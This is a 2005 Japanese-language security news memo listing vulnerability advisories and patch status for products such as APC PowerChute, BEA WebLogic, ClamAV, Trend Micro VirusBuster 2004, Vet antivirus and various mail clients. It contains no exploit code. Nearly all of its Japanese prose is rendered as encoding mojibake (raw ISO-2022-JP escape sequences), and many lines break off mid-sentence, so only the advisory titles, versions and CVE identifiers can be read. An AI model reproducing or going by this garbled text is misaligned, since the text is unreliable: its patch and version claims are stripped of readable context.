$B%;%-%e%j%F%#%[!<%k(B memo - 2005.05

$B!!(BAPC PowerChute Business Edition v6.x.x $B$K7g4Y!#(B 2005.07.28 06:43 $B0J9_$K(B PowerChute $B%5!<%P(B / $B%(!<%8%'%s%H%5!<%S%9$r5/F0$7$h$&$H$7$F$b5/F0$G$-$J$$!#(B $B$3$l$O!"(BSun $B$N(B Java JDK/JRE $B$K4^$^$l$k!V0E9f2=%3%s%]!<%M%s%H$N0lIt4|8B@Z$l!W$,860x$@$H$$$&!#(B PowerChute Business Edition v7.0 $B$K$O$3$N7g4Y$O$J$$!#(B

$B!!BP1~J}K!$H$7$F$O!"0J2<$NJ}K!$,$"$k!#(B

• $B%7%j%"%kHV9f$NF~NO$K$h$jL5=~$GF~

• $BMQ0U$5$l$F$$$k(B patch $B$rE,MQ$9$k!#(B Windows NT 4.0 $B$d(B Red Hat Linux 7.1 / 7.2 $B$G$O$3$A$i$7$+A*Br$G$-$J$$!#(B

$B!!F#0f$5$s>pJs$"$j$,$H$&$4$6$$$^$9!#4XO"(B:

• PowerChute Business Edition v6.1.2$BIT6q9g=$@5%Q%C%A6[5^E,MQ$N$*4j$$(B ($BEl

• APC Security Advisory - Denial of Service Vulnerability with PowerChute Business Edition (apc.com)

  $B1Q8lHG%"%I%P%$%6%j!#$3$A$i$G$O!"1F6A$N$"$k$N$O(B PowerChute Business Edition 6.0 $B!A(B 7.0.1 $B$H$J$C$F$$$k$N$GCm0U!#(B7.0.2 $B$G=$@5$5$l$F$$$k$=$&$@!#(B $BF|K\8lHG$N(B PowerChute Business Edition v7.0 $B$O(B 7.0.2 $B0J9_AjEv$J$N$@$m$&$H;W$o$l!#(B

2005.06.03 $BDI5-(B:

$B!!(BAPC$B ($B%f%K%7%9(B, 6/3)

$B!!(B$B=EMW(B: PowerChute Business Edition v6.x.x $B=$@5BP1~$N$40FFb(B (APC) $B$,2~D{$5$l$F$$$^$9!#(B $B860x$O!"(BSun $B$N(B Java JDK/JRE $B$K4^$^$l$k!V0E9f2=%3%s%]!<%M%s%H$N0lIt4|8B@Z$l!W(B $B$G$O$J$/!"!V(BPowerChute Business Edition v6.x.x$B$N>ZL@=q$N4|8B@Z$l!W$@$=$&$G$9!#(B $B$^$?!"(B APC Security Advisory - Denial of Service Vulnerability with PowerChute Business Edition (apc.com) $B$OA4A34X78$J$$OC$G$7$?!#$9$$$^$;$s!#(Borz

$B!!F`NI$5$s>pJs$"$j$,$H$&$4$6$$$^$9!#(B

2005.07.14 $BDI5-(B:

$B!!(BPowerChute Business Edition v6.x.x $B$NLdBj$K4X$9$k(B Q&A$B=8(B (APC) $B$,$G$-$F$$$^$7$?!#(B

• [SA15548] Nortel VPN Routers IKE Packet Handling Denial of Service$B!#(BNortel VPN router 1010, 1050, 1100, 600, 1600, 1700, 2600, 2700, 4500, 4600, 5000 $B$,BP>]$@$=$&$G!#%=%U%H%&%'%"%P!<%8%g%s(B 5.05_200 $B$GBP1~$5$l$F$$$kB>!"(B 4.76, 4.85, 4.90, 5.00 $BMQ$N(B patch $B$,MQ0U$5$l$F$$$k$=$&$G!#(B

• [SA15546] Microsoft Internet Explorer "window()" Denial of Service Weakness$B!#(B $B

Windows 98$B!?(BMe$B!\%&%$%k%9%P%9%?!<(B2004$B$G(BWindows$B%(%i!<$,I=<($5$l$kIT6q9g(B

$B!!(B$B%&%$%k%9%P%9%?!<(B2004: $B%"%C%W%G!<%H8e!"!V(BPCCPFW$B$,860x$G(Bkernel32.dll$B$K%(%i! ($B%H%l%s%I%^%$%/%m(B)$B!#=$@5%W%m%0%i%`$,!V(B1029$B!W$KJQ99$5$l$F$$$^$9!#(B $B$^$C$A$c$@$$$U$/$5$s>pJs$"$j$,$H$&$4$6$$$^$9!#(B

Computer Associates Vet Antivirus engine heap overflow vulnerability

$B!!(BBrightStor ARCserve Backup r11.1 $B$K$O!"$3$N7g4Y$O$J$$$=$&$@(B: RE: CAID 32896 - Computer Associates Vet Antivirus engine heap overflow vulnerability

*BSD, SCO OpenServer / UnixWare Hyper-Threading Considered Harmful

$B!!(BJVNVU#911878: simultaneous multithreading $B%W%m%;%C%5$K$*$1$k5!L)>pJsO31L$N2DG=@-(B

$B!!(B(typo fixed: $B7'G-$5$/$i$5$s46

$B!!(BBEA WebLogic Server 6.x / 7.x / 8.x, BEA WebLogic Express 6.x / 7.x, BEA WebLogic Portal 8.x $B$KJ#?t$N7g4Y!#(B $B:G?7$N(B Service Pack $B$G=$@5$5$l$F$$$k$+!"(B patch $B$,MQ0U$5$l$F$$$k!#(B

• BEA05-75.00: Monitor security role $B$r5v2D$5$l$?%f!<%6$,(B JDBC connection pool $B$r=L>.!&%j%;%C%H$G$-$k!#(B WebLogic Server 8.1 SP2/SP3 $B$K1F6A!#(B SP4 $B$GBP1~!#(B

• BEA05-76.00: security provider $B$,@8@.$9$kNc30$r=hM}!&4F::$G$-$J$$!#(B WebLogic Server 8.1 SP3 $B0JA0!"(BWebLogic Server 7.0 SP5 $B0JA0$K1F6A!#(B WebLogic Server 8.1 SP4$B!"(BWebLogic Server 7.0 SP6 $B$GBP1~!#(B

• BEA05-77.00: web $B%"%W%j$r:FG[CV$7$?>l9g$K(B user $B$N%m%0%"%&%H=hM}$,9T$o$l$J$$!#(B WebLogic Server / WebLogic Express SP5 $B0JA0$K1F6A!#(B SP6 $B$GBP1~!#(B

• BEA05-78.00: $B%Q%9%o!<%IF~NO$r8m$k$HI8=`=PNO$K=PNO$5$l$F$7$^$&!#(B WebLogic Portal 8.1 SP3 $B0JA0$K1F6A!#(B SP4 $B$GBP1~!#(B

• BEA05-79.00: $B%/%i%9%?9=@.$K$*$$$F!"(Bcookie $B$r:Y9)$5$l$k$H(B DoS$B!#(B WebLogic Server 7.0 SP5 $B0JA0$K1F6A!#(B SP6 $B$GBP1~!#(B

• BEA05-80.00: XSS $B7g4Y!#(B WebLogic Server 8.1 SP4 $B0JA0!"(BWebLogic Server 7.0 SP6 $B0JA0$K1F6A!#(B 8.1 SP4 / 7.0 SP6 $BMQ$N(B patch $B$,MQ0U$5$l$F$$$k!#(B

  $B4XO"(B:

  • ASPR #2005-05-24-1: HTML Injection in BEA WebLogic Server Console (1)
  • ASPR #2005-05-24-2: HTML Injection in BEA WebLogic Server Console (2)
  • SHATTER Team Security Alert: BEA WebLogic Administration Console error page cross-site scripting vulnerability
  • SHATTER Team Security Alert: BEA WebLogic Administration Console login page cross-site scripting vulnerability

• BEA05-81.00: $BAH9~(B LDAP $B%5!<%P$KBP$9$k(B DoS$B!#(B WebLogic Server 8.1 SP4 $B0JA0!"(BWebLogic Server 7.0 SP5 $B0JA0$K1F6A!#(B 7.0 SP6 $B$GBP1~!#(B 8.1 SP4 $B$K$D$$$F$O(B patch $B$,MQ0U$5$l$F$$$k!#(B

• BEA05-82.00: remote buffer overflow$B!#(B WebLogic Server / WebLogic Express 6.1 SP4 $B$K1F6A!#(B SP5 $B0J9_$GBP1~!#(B

2005.06.01 $BDI5-(B:

$B!!(B$B%;%-%e%j%F%#%"%I%P%$%6%j(B (beasys.co.jp) $B$KF|K\8lHG$,=P$F$$$^$9!#(Bvulcan $B$5$s>pJs$"$j$,$H$&$4$6$$$^$9!#(B

$B!!(BClamAV 0.80rc4 $B!A(B 0.84rc2 $B$r(B Mac OS X $B>e$GMxMQ$9$k>l9g$K7g4Y!#(B $BFbItE*$KMxMQ$7$F$$$k(B ditto $B%3%^%s%I$N8F$S=P$7$K7g4Y$,$"$j!"(B $B:Y9)$r;\$7$?%U%!%$%kL>$r;XDj$9$k$3$H$K$h$jG$0U$N%7%'%k%3%^%s%I$r

$B!!(BClamAV 0.84 $B0J9_$G=$@5$5$l$F$$$k!#(B

*BSD, SCO OpenServer / UnixWare Hyper-Threading Considered Harmful

$B!!(B$B!V(BOS$B%Y%s%@!<3F (CNET, 2005.05.30)

$B!!(B$BDa55%a!<%k(B 3.53$B!A(B4.15 $B$K7g4Y!#FCpJs$,O31L$7$?$H4*0c$$$9$kEy!K$rH/@8$5$;$k62$l$,$"!W$k$H$$$&!#>\:Y$O8x3+$5$l$F$$$J$$!#!V56Au!W$H$$$&$H(B XSS $B$rO"A[$7$F$7$^$&$N$@$,!"$O$F$5$F!D!D!#(B

$B!!Da55%a!<%k(B 4.16 $B$G=$@5$5$l$F$$$k!#$^$?Da55%a!<%k(B 4.16 $B$G!V$7!W$r$7!W$N7k2L$,0[$J$k(B)$B!#(B

Windows 98$B!?(BMe$B!\%&%$%k%9%P%9%?!<(B2004$B$G(BWindows$B%(%i!<$,I=<($5$l$kIT6q9g(B

$B!!$^$C$A$c$@$$$U$/$5$s$+$i(B ($B$"$j$,$H$&$4$6$$$^$9(B):

Trend$B$N%Z!<%8$G$O!"(B1.2.0.1027$B$,LdBj$N$"$k%b%8%e!<%k$@$=$&$G$9$,!"0J2pJs(B]$B%@%$%"%m%0%\%C%/%9Fb$KI=<($5$l$k!V%U%!%$%"%&%)!<%k%I%i%$%P!W(B
$B$N%P!<%8%g%s$r3NG'$7!"!V(B1.2.0.1027$B!W$H$J$C$F$$$l$P:#2s$NLdBj$K3:Ev$7$^$9!#(B
---

$B%@%&%s%m!<%I$G$-$k=$@5%b%8%e!<%k$O(Bvb24_TM_CFW_1020.exe$B$G$9!#(B
$B$3$l$C$F!"$b$7$d!"(B1.2.0.1020$B$N8E$$%b%8%e!<%k!)!*$H;W$C$FD4$Y$F$_$k$H(B
---
strings TM_CFW.VXD
<SNIP>
VxD TM_CFW (VtoolsD)
_The_DDB
VS_VERSION_INFO
StringFileInfo
040904E4
ProductVersion
1.2.0.1020
ProductName
Trend Micro Common Firewall 1.2
---
$B$"$!!"!"!"=$@5%b%8%e!<%k$8$c$J$/$C$F!"La$9%b%8%e!<%k$+$$!*!*!*!*!*!*!*(B
$B$H$j$"$($:$NBP=h$J$N$G$7$g$&$,$J$$$G$9$+$M!#(B
      
$B$G$b!"$3$l$O7h$7$F=$@5%b%8%e!<%k$H$O8F$P$J$$!*$H(B $B$^$C$A$c$O;W$C$?$N$G$7$?!#(B

$B!!(BWindows 98 ($BB?J,(B 98 SE $B$b(B) / Me + $B%&%$%k%9%P%9%?!<(B 2004 + 2005.05.26 20:20 $B!A(B 2005.05.27 02:30 $B$N4V$K%"%C%W%G!<%H$7$??M!"(B $B$N>l9g$K%(%i!<$,=P$k$=$&$G!#$A$$$A$c$s$5$s>pJs$"$j$,$H$&$4$6$$$^$9!#(B

• $B%&%$%k%9%P%9%?!<(B2004 $B%$%s%?!<%M%C%H(B $B%;%-%e%j%F%#(B: $B%"%C%W%G!<%H;~!"%(%i!<$,I=<($5$l$k(B ($B%H%l%s%I%^%$%/%m(B)
• $B%&%$%k%9%P%9%?!<(B2004: $B%"%C%W%G!<%H8e!"!V(BPCCPFW$B$,860x$G(Bkernel32.dll$B$K%(%i! ($B%H%l%s%I%^%$%/%m(B)

$B!!(Bsolution 11404 $B$+$i=$@5%b%8%e!<%k$rF~

% unzip -l vb24_TM_CFW_1020.exe 
Archive:  vb24_TM_CFW_1020.exe
warning [vb24_TM_CFW_1020.exe]:  75232 extra bytes at beginning or within zipfile
  (attempting to process anyway)
  Length     Date   Time    Name
 --------    ----   ----    ----
   759931  11-05-04 16:07   TM_CFW.VXD
    98304  11-05-04 16:08   tmCfwApi.dll
 --------                   -------
   858235                   2 files

$B!!2?$,=$@5$5$l$?$s$@$m$&$J$"!#(B

2005.05.29 $BDI5-(B:

$B!!$^$C$A$c$@$$$U$/$5$s$+$i(B ($B$"$j$,$H$&$4$6$$$^$9(B):

Trend$B$N%Z!<%8$G$O!"(B1.2.0.1027$B$,LdBj$N$"$k%b%8%e!<%k$@$=$&$G$9$,!"0J2pJs(B]$B%@%$%"%m%0%\%C%/%9Fb$KI=<($5$l$k!V%U%!%$%"%&%)!<%k%I%i%$%P!W(B
$B$N%P!<%8%g%s$r3NG'$7!"!V(B1.2.0.1027$B!W$H$J$C$F$$$l$P:#2s$NLdBj$K3:Ev$7$^$9!#(B
---

$B%@%&%s%m!<%I$G$-$k=$@5%b%8%e!<%k$O(Bvb24_TM_CFW_1020.exe$B$G$9!#(B
$B$3$l$C$F!"$b$7$d!"(B1.2.0.1020$B$N8E$$%b%8%e!<%k!)!*$H;W$C$FD4$Y$F$_$k$H(B
---
strings TM_CFW.VXD
<SNIP>
VxD TM_CFW (VtoolsD)
_The_DDB
VS_VERSION_INFO
StringFileInfo
040904E4
ProductVersion
1.2.0.1020
ProductName
Trend Micro Common Firewall 1.2
---
$B$"$!!"!"!"=$@5%b%8%e!<%k$8$c$J$/$C$F!"La$9%b%8%e!<%k$+$$!*!*!*!*!*!*!*(B
$B$H$j$"$($:$NBP=h$J$N$G$7$g$&$,$J$$$G$9$+$M!#(B

$B$G$b!"$3$l$O7h$7$F=$@5%b%8%e!<%k$H$O8F$P$J$$!*$H(B $B$^$C$A$c$O;W$C$?$N$G$7$?!#(B

2005.06.01 $BDI5-(B:

$B!!(B$B%&%$%k%9%P%9%?!<(B2004: $B%"%C%W%G!<%H8e!"!V(BPCCPFW$B$,860x$G(Bkernel32.dll$B$K%(%i! ($B%H%l%s%I%^%$%/%m(B)$B!#=$@5%W%m%0%i%`$,!V(B1029$B!W$KJQ99$5$l$F$$$^$9!#(B $B$^$C$A$c$@$$$U$/$5$s>pJs$"$j$,$H$&$4$6$$$^$9!#(B

$B!!(BBlackDiamond 8800 / 10808 (10K) Switch $B>e$N(B ExtremeWare XOS 10.x / 11.x $B$K7g4Y!#(B $B%f!<%6%l%Y%k%"%+%&%s%H$+$i4IM}

$B!!(BExtremeWare XOS 11.0.2.4 $B$*$h$S(B 11.1.3.3 $B$G=$@5$5$l$F$$$k!#(B

$B2A3J(B.com$B%5%$%H$,IT@5%"%/%;%9Ho32$GJD:?Cf(B

$B!!F1MM;vNc(B:

• $B%&%$%k%9$K4X$9$kDI2C>pJs!!(B2005/5/27 20:30$B!!DI2C>pJs(B (ozmall.co.jp)

  $B!!%&%#%k%946@w$K$D$-$^$7$F$O!"#57n#2#5F|!J?e!KCf$K%*%:%b!<%k$K%"%/%;%9$7$?0lIt$NJ}$K!"%$%s%?!<%M%C%H%-%c%C%7%e%U%)%k%@$K%&%$%k%9%U%!%$%k$,%@%&%s%m!<%I$5$l$F$7$^$&$H$$$&8=>]$,3NG'$5$l$^$7$?!#H=L@$7$F$$$k?7

ASP.NET $B%Q%98!>Z$N@H

$B!!(BInstallation of .NET Framework service packs is not completed if you first install security update MS05-004 (Microsoft)$B!#(B

Windows Kernel $B$N@H:3J$*$h$S%5!<%S%95qH]$,$*$3$k(B (890859) (MS05-018)

$B!!(BYou receive a "STOP 0x0000001E" error after you install security update MS05-018 on a Windows 2000-based computer (Microsoft)$B!#%5%]!<%H7PM3$G(B hotfix $B$rF~

JVN#FCAD9BD8: $B%a!<%k%/%i%$%"%s%H%=%U%H$K$*$1$k(B mailto URL scheme $B$NITE,@Z$J2r

$B!!(BBecky! Internet Mail Ver.2.21.02 (Bcc $BL5;kHG(B) $BEP>l$K$"$o$;$F5-=R$r=$@5!#(B

$B!!4XO"(B: mailto: URL $B$G(B Bcc: $B$,;XDj$G$-$F$7$^$&LdBj(B ($B?eL57n$P$1$i$N$($SF|5-(B, 2005.05.26)

• [SA15495] avast! Antivirus Device Driver Memory Overwrite Vulnerability$B!#(B avast! 4.6.665 $B$G=$@5$5$l$F$$$k$=$&$@!#(B

• High Risk Vulnerability in L-Soft's LISTSERV Server$B!#(B remote $B$+$i$NG$0U$N%3!<%I$N

• [SA15442] Mailutils Four Vulnerabilities$B!#(B GNU Mailutils 0.5 / 0.6 $B$K(B 4 $B$D$N7g4Y!#(B 0.6.90 $BHG$G=$@5$5$l$F$$$k!#(B CVE: CAN-2005-1520 CAN-2005-1521 CAN-2005-1522 CAN-2005-1523

• [SA15486] BEA WebLogic Multiple Vulnerabilities$B!#(B WebLogic Server 6$B!A(B8$B!"(BWebLogic Express 6$B!A(B8$B!"(BWebLogic Portal 8.x $B$K7g4Y!#(B $B4XO"(B: $B4JC1$K@0M}$7$F$$$3$&!#!#!#(B ($B%t%!%k%+%s$N5$$^$0$lF|5-(B, 5/25)

$B!!J#?t%Y%s%@$N(B DNS $B%G!<%?=hM}$K7g4Y!#(B RFC1035 $B$N(B 4.1.4 $B$GDj5A$5$l$F$$$k!"(B $B05=L$5$l$?(B DNS $B%a%C%;!<%8$NE83+=hM}$K7g4Y$,$"$j!"0[>o=*N;$dG$0U$N%3!<%I$Nl9g$,$"$k!#(B $B7g4Y$,$"$k$H$5$l$F$$$k$N$O0J2<$N$b$N(B:

• DeleGate$B!#(B 8.10.3 $B$G=$@5$5$l$F$$$k!#:G?7$N(B stable $BHG$O(B 8.11.4$B!#(B CVE: CAN-2005-0036

• DNRD$B!#(B 2.18 $B$G=$@5$5$l$F$$$k!#(B CVE: CAN-2005-0037

• pcnfsd$B!#(B $B$3$N7o$K$D$$$F$N7g4Y$O$J$$$,!"(B1.2 $B$h$jA0$K$O$$$m$s$J7g4Y$,$"$k$N$G!"(B 1.2 $B0J>e$NHG$r;H$&$3$H$,?d>)$5$l$F$$$k!#(B

• PowerDNS$B!#(B $B:G?7(B 2.9.17 $B$K$O$3$N7g4Y$O$J$$$,!"(B2.9.16 $B0JA0$G$O0[>o=*N;$7$F$7$^$&!#(B CVE: CAN-2005-0038

$B!!$^$?(B NISCC Vulnerability Advisory DNS - 589088 $B$K$O5-:\$5$l$F$$$J$$$,!"(BCisco $B$+$i(B Cisco Security Notice: Crafted DNS Packet Can Cause Denial Of Service (Cisco) $B$,=P$F$$$k!#(B Cisco IP Phones 7902/7905/7912, Cisco ATA (Analog Telephone Adaptor) 186/188, Cisco Unity Express, Cisco ACNS (Application and Content Networking System) devices $B$K7g4Y$,$"$j!"(BDoS $B>uBV$K$J$kLOMM!#(B

$B!!4XO"(B: NISCC-589088: DNS $B%Q%1%C%H$K4^$^$l$k05=L$5$l$?%G!<%?$NE83+=hM}$K4X$9$k@H (JVN)

$B!!(BKeynote 2 / 2.0.1 $B$K7g4Y!#:Y9)$7$?(B Keynote $B%W%l%<%s%F!<%7%g%s$H(B keynote: URI $B%O%s%I%i$NMxMQ$K$h$j!"(Blocal file $B$rFI$_CAN-2005-1408

$B!!(BKeynote 2.0.2 $B$G=$@5$5$l$F$$$k!#(BKeynote 2.0.2 $B$G$O!"30It%j%=!<%9$N;2>H$,@)8B$5$l!"(Bkeynote: URI $B%O%s%I%i$O:o=|$5$l$?!#(B

$B!!(B$B%=%U%H%&%'%"(B $B%"%C%W%G!<%H(B$B$+$i(B Keynote 2.0.2 $B$rF~Keynote $B%@%&%s%m!<%I%Z!<%8(B$B$G$O$^$@(B Keynote 2.0.1 $B$,G[I[$5$l$F$$$k!#(B

IEBlog$B$K$h$k$H!"LdBj$r2r7h$9$k$K$O(BNetscape 8$B$r%"%s%$%s%9%H!<%k$7$?8e!"%l%8%9%H%j%(%G%#%?$r5/F0$7$F!V(BHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Plugins\Extension$B!W$N9`L\$K$"$k!V(Bxml$B!W$H5-$5$l$?%N!<%I$r:o=|$7$J$1$l$P$J$i$J$$$H$$$&!#$=$N8e!"(BIE$B$r:F5/F0$9$k$H(BIE$B$N(BXML$B%l%s%@%j%s%05!G=$,@5>o$KF/$/$h$&$K$J$k!#(BNetscape 8$B$,%$%s%9%H!<%k$5$l$?>uBV$G$O@d$($:$3$N%l%8%9%H%j$r5-F~$7B3$1$k$?$a!"(BIE$B$N(BXML$B%l%s%@%j%s%05!G=$rI|5l$9$k$3$H$,$G$-$J$$$H$7$F$$$k!#(B

$B!!$@$=$&$J$N$G!"(BNetscape 8 $B$rMxMQ$9$k>l9g$O$4Cm0U!#(B

2005.06.22 $BDI5-(B:

$B!!(BNetscape 8.02 $B$G=$@5$5$l$?$=$&$G$9(B: IE$B$K0[>o$r$b$?$i$7$?!H(BNetscape 8$BLdBj!I$r=$@5!"!V(BNetscape 8.02$B!W8x3+(B (Internet Watch, 2005.06.20)

$B!!(BCc: $B$d(B Bcc: $B$r4^$^$;$?(B mailto: URL $B$r$?$I$C$?>l9g$K!"(BCc: $B$d(B Bcc: $B$,B8:_$9$k$3$H$K5$$,$D$+$J$$(B ($BI=<($5$l$J$$!"5$$,$D$-$K$/$$Ey(B) $B$^$^%a!<%k$rAw$C$F$7$^$&%a!<%k%=%U%H$,$"$k!"$H$$$&OC$NLOMM!#(B RFC2368: The mailto URL scheme $B$K$O$3$s$JJ8>O$b$"$k$=$&$G(B:

Note that some headers are inherently unsafe to include in a message generated from a URL. For example, headers such as "From:", "Bcc:", and so on, should never be interpreted from a URL. In general, the fewer headers interpreted from the URL, the less likely it is that a sending agent will create an unsafe message.

$B!!(Bmailto: URL $BCf$N!">/$J$/$H$b(B Bcc: $B$O!"L5;k$9$k$N$,E,@Z$JF0:n$J$N$G$7$g$&!#(B Cc: $B$bL5;k$7$F$$$$$h$&$J5$$,$9$k$1$I!#(B

$B!!>u67(B:

• EdMax / EdMax$B%U%j!: $BI=<($O$5$l$k!#(B $B$^$?(B EdMax 3.06 / EdMax$B%U%j! $B0J9_$G$O(B mailto: URL $BCf$N(B Bcc, Cc $B$rL5;k$9$k!#(B

• Shuriken Pro3 / Pro4: $B4JN,I=<(%b!<%I$N>l9g$KI=<($5$l$J$$!#(B $B%"%C%W%G!<%H%b%8%e!<%k(B$B$rE,MQ$9$k$H!"4JN,I=<(%b!<%I$N>l9g$G$bI=<($5$l$k$h$&$K$J$k!#(B

• Microsoft $BJ}LL(B: $BI=<($5$l$k!#(B

• WinBiff: $B!V;d$O$=$=$C$+$7$$!JAw?.$9$kA0$K3NG'!K!W%*%W%7%g%s$,M-8z(B ($B%G%U%)%k%H(B: $BM-8z(B) $B$J>l9g$K$OI=<($5$l$k!#(B V2.50beta$B0J9_$GBP1~M=Dj(B$B$@$=$&$@$,!"$I$N$h$&$K!VBP1~!W$5$l$kM=Dj$J$N$+$O$h$/$o$+$i$J$$!#(B

• Becky! Internet Mail: Ver.2.20.03 $B0J9_$G$OI=<($O$5$l$k!#(B Ver.2.21.02 $B0J9_$G$O(B mailto: URL $BCf$N(B Bcc: $B$rL5;k$9$k!#(B

• $BDa55%a!<%k(B: $B4{DjCM$G$OI=<($5$l$k!#(B Bcc: $B$rHsI=<($K$9$k%*%W%7%g%s$r@_Dj$9$k$H!"I=<($5$l$J$$!#(B ($B8MED$5$s>pJs$"$j$,$H$&$4$6$$$^$9(B)

  $B>\:Y(B: $BDa55%a!<%k$G$N(Bmailto:$B%W%m%H%3%k$K4X78$7$?@H (maruo.co.jp)

  Version 4.13$B0J9_$N>l9g$@$H!"(Bmailto:$B%W%m%H%3%k$GHsI=<(BP>]$N%X%C%@$,;XDj$5$l$?>l9g$K$O!"<+F0E*$K%X%C%@I=<($r!V$9$Y$FI=<(!W$K@Z$jBX$($k$h$&$K$J$C$F$$$^$9!#(B

$B!!(BBecky! Internet Mail Ver.2.21.02 (Bcc $BL5;kHG(B) $BEP>l$K$"$o$;$F5-=R$r=$@5!#(B

$B!!(B$BDa55%a!<%k$G$N(Bmailto:$B%W%m%H%3%k$K4X78$7$?@H (maruo.co.jp) $B$X$N%j%s%/$rDI2C!#(B

$B!!4XO"(B: mailto: URL $B$G(B Bcc: $B$,;XDj$G$-$F$7$^$&LdBj(B ($B?eL57n$P$1$i$N$($SF|5-(B, 2005.05.26)

TCP/IP $B$N@H

$B!!(BMicrosoft Security Advisory (899480) $B$NF|K\8lHG$,=P$^$7$?(B: $B%^%$%/%m%=%U%H(B $B%;%-%e%j%F%#(B $B%"%I%P%$%6%j(B (899480) TCP $B$N@H (Microsoft)

$B!!(BCA $B$N(B eTrust Antivirus $B$d(B BrightStor ARCserve Backup r11.1$B!"(BZonelabs $B$N(B ZoneAlarm SecuritySuite / AntiVirus $B$J$I$K4^$^$l$k(B Vet $B%(%s%8%s$N(B 11.9.1 $B$h$jA0$NHG$K7g4Y!#(BOLE $B%9%H%j!<%`$N2r@O;~$K(B integer overflow $B$r5/0x$H$9$k(B heap overflow $B$,H/@8!"96N,(B Office $B%I%-%e%a%s%H$K$h$jG$0U$N%3!<%I$rpJs$"$j$,$H$&$4$6$$$^$9!#(B

$B!!(BVet $B%(%s%8%s(B 11.9.1 $B$G=$@5$5$l$F$$$k!#<+F099?7$5$l$k@=IJ(B (eTrust EZ Antivirus 7.x $B$J$I(B) $B$H!"

$B!!4XO"(B:

• CVE: CAN-2005-1693
• Computer Associates Vet Antivirus Rem0te Heap Overflow Security Advisory (rem0te.com)
• Vulnerability ID: 32896 - CA eTrust EZ Antivirus Document Scanning Engine Vulnerability (my-etrust.com)
• [Full-disclosure] Zone Labs ZoneAlarm Vet anti-virus engine OLE processing vulnerability

2005.05.31 $BDI5-(B:

$B!!(BBrightStor ARCserve Backup r11.1 $B$K$O!"$3$N7g4Y$O$J$$$=$&$@(B: RE: CAID 32896 - Computer Associates Vet Antivirus engine heap overflow vulnerability

• [ GLSA 200505-17 ] Qpopper: Multiple Vulnerabilities$B!#(B qpopper 4.0.6 $B$G=$@5$5$l$?7g4Y(B$B$N7o!#:G?7$O(B 4.0.8$B!#(B CVE: CAN-2005-1151 CAN-2005-1152

• [Full-disclosure] XSS in Sambar Server version 6.2$B!#(B 6.2.1 $B$G=$@5$5$l$F$$$k$=$&$G!#(B

• Blue Coat Reporter multiple remote vulnerabilities$B!#(B 7.1.2 $B$h$jA0$N(B Blue Coat Reporter $B$KJ#?t$N7g4Y$,$"$j!"(B Blue Coat Reporter 7.1.2 $B$G=$@5$5$l$?$=$&$G$9!#(B Security Advisory: Blue Coat Reporter Vulnerabilities (bluecoat.com)

• [SA15483] IMail Server Multiple Unspecified Vulnerabilities$B!#(B IMail Server 8.2 Hotfix 2 $B$G=$@5$5$l$F$$$k!#(B

  • [Full-disclosure] iDEFENSE Security Advisory 05.24.05: Ipswitch IMail IMAP STATUS Remote Buffer Overflow Vulnerability
  • [Full-disclosure] iDEFENSE Security Advisory 05.24.05: Ipswitch IMail IMAP LSUB DoS Vulnerability
  • [Full-disclosure] iDEFENSE Security Advisory 05.24.05: Ipswitch IMail IMAP LOGIN Remote Buffer Overflow Vulnerabilities
  • [Full-disclosure] iDEFENSE Security Advisory 05.24.05: Ipswitch IMail Web Calendaring Arbitrary File Read Vulnerability
  • [Full-disclosure] iDEFENSE Security Advisory 05.24.05: Ipswitch IMail IMAP SELECT Command DoS Vulnerability

• [ GLSA 200505-16 ] ImageMagick, GraphicsMagick: Denial of Service vulnerability$B!#(B ImageMagick < 6.2.2.3 $B$N7g4Y!#:Y9)$7$?(B XWD $B%U%!%$%k$G(B CPU $B$r?)$C$F$7$^$&LOMM!#(B ChangeLog $B$K$"$k$3$l$+$J(B:

  2005-05-06  Taviso  <taviso@sdf.li...>
    * Avoid infinite loop if bogus XWD rad/green/blue masks are 0;

• [ GLSA 200505-18 ] Net-SNMP: fixproc insecure temporary file creation$B!#(B net-snmp-5.2.1 $B$K4^$^$l$k(B fixproc $B%9%/%j%W%H$N0l;~%U%!%$%k$N$D$/$jJ}$,%"%l$H$$$&OC!#(B

JVN#465742E4: Wiki $B%/%m!<%s$K$*$1$k%/%m%9%5%$%H%9%/%j%W%F%#%s%0$N@H

$B!!(B$B%U%!%$%kE:IU$N@H ($B$U$'$_$K$sF|5-(B, 5/21)$B!#(BHiki $B$G

JVN#465742E4: Wiki $B%/%m!<%s$K$*$1$k%/%m%9%5%$%H%9%/%j%W%F%#%s%0$N@H

$B!!(BFreeStyleWiki $B$K$bF1MM$N7g4Y$,$"$C$?$h$&$G!"(B3.5.8 $B$G=$@5$5$l$F$$$k$=$&$G$9(B:

• $BMzNr(B/2005-5-19 (FreeStyleWiki)

$B!!(B12 $B%$%s%A(B iBook G4$B!"(B12 $B%$%s%A(B PowerBook G4$B!"(B15 $B%$%s%A(B PowerBook G4 $B$N%P%C%F%j$N0lIt$K!"2aG.$7H/2P$9$k2DG=@-$,$"$k$=$&$G!"L5=~8r49$r9T$C$F$$$k$=$&$G$9!#(B iBook G4 / PowerBook G4 $BMxMQ]$H$J$k%P%C%F%j$N7?HV$O0J2<$N$H$*$j$G$9!#(B

$B!!$7$+$7!"$3$&$$$&=EMW$J%K%e!<%9$,(B $B%[%C%H%K%e!<%9(B (Apple) $B$K7G:\$5$l$J$$$N$O$J$s$G$@$m$&!#(B

• DeleGate 8.11.4 $B$,=P$F$$$^$9!#(BDoS $B>uBV$K$J$C$F$7$^$&$3$H$,$"$kLdBj$,=$@5$5$l$F$$$^$9(B: DeleGate ML 12867 ($B%"%/%;%9%Q%9%o!<%I$K$D$$$F$O(B $B$3$A$i(B$B$r;2>H(B)$B!#(B $B%P!<%8%g%s(B 8 $BMxMQ)$5$l$F$$$^$9!#(B

• [Full-disclosure] Mac OSX 10.4 Dashboard Authentication Hijacking Vulnerability$B!#(BDashboard $B$H$$$&$h$j$O(B sudo $B$NLdBj(B? $B;XE&)2sHr:v(B$B!#(B

• DSA-725-1 ppxp -- missing privilege release (debian.org)$B!#(B PPxP $B$,(B root $BFC8"$rl9g$,$"$jF@$kLOMM!#(B

• [SA15361] FreeRADIUS Potential SQL Injection and Buffer Overflow Vulnerabilities

• Yahoo! Messenger may be storing all session data 'Unencoded' on the local machine$B!"(BReply

• NOVELL ZENWORKS MULTIPLE REMOTE STACK & HEAP OVERFLOWS

• [ GLSA 200505-15 ] gdb: Multiple vulnerabilities$B!#(B Vulnerable: < 6.3-r3 $B$@$=$&$G!#(B

Vulnerability Note VU#637934: TCP does not adequately validate segments before updating timestamp value

$B!!(BFreeBSD $B$N9`$K>pJs$rDI2C$7$^$7$?!#(B

